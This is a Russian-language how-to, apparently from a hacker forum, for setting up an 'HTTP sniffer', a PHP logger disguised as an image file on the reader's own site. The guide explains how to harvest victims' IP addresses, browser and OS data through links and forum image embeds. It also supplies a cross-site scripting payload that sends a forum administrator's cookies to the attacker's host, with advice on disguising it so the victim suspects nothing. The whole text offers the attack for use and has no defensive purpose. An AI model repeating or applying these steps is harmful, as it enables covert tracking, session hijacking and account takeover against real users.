Здравствуй, сейчас я расскажу тебе как установить и настроить простой HTTP-сниффер. Для начала тебе нужно иметь архив со сниффером. Ах у тебя нет сниффера? ну чтож, специально для таких как ты я приаттачил его. Также у тебя должен быть свой сайт и у тебя должен быть доступ к нему по FTP. Всё имеется? Отлично. Теперь я расскажу тебе как установить сниффер. Распакуйте архив с программой и поместите папку sn/ в директорию вашего веб-сервера (обычно называется "WWW"). Передача данных осуществляется через cgi-запрос (более подробное описание использования смотреть в файле index.html). Для нормальной работы сниффера необходимо установить права на запись для файла sn/s.jpg/log.db. * Замените слова "АДРЕС_ВАШЕГО_САЙТА" в файле index.html на адрес вашего сайта и название папки сниффера, * если оно отлично от "sn" (для удобства чтения инструкции по использованию для всех пользователей), а также * в файле sn/s.jpg/index.php в строках: $W = str_replace("/sn/s.jpg/?","",$W); и $W = str_replace("/sn/s.jpg/","",$W); * для вывода строки запроса без пути к папке сниффера. Чтобы получить IP-адрес пользователя, ему даётся приглашение посетить ссылку: http://АДРЕС_ВАШЕГО_САЙТА/sn/s.jpg После её посещения IP и данные об обозревателе и операционной системе жертвы можно будет посмотреть по ссылке: http://АДРЕС_ВАШЕГО_САЙТА/sn/log.php. Чтобы получить IP-адреса пользователей с форума, позволяющего размещать картинки в теле сообщения, можно в качестве ссылки на картинку указать адрес сниффера (однако принадлежность IP-адреса тому или иному пользователю выяснить, скорее всего, не удастся). Чтобы получить данные, по которым имеющий представленную уязвимость форум (имеются в виду Cookies) авторизует администратора, нужно, например, в тексте сообщения разместить следующий JavaScript-сценарий: <script>img = new Image(); img.src = "http://АДРЕС_ВАШЕГО_САЙТА/sn/s.jpg?"+document.cookie;</script> После просмотра данного сообщения в строке "Запрос" будет получено содержание Cookies жертвы, причём сама жертва увидит лишь картинку размером 1 на 1 точку. Вы можете подставить и другую картинку если не хотите чтобы жертва что-нибудь заподозрила.
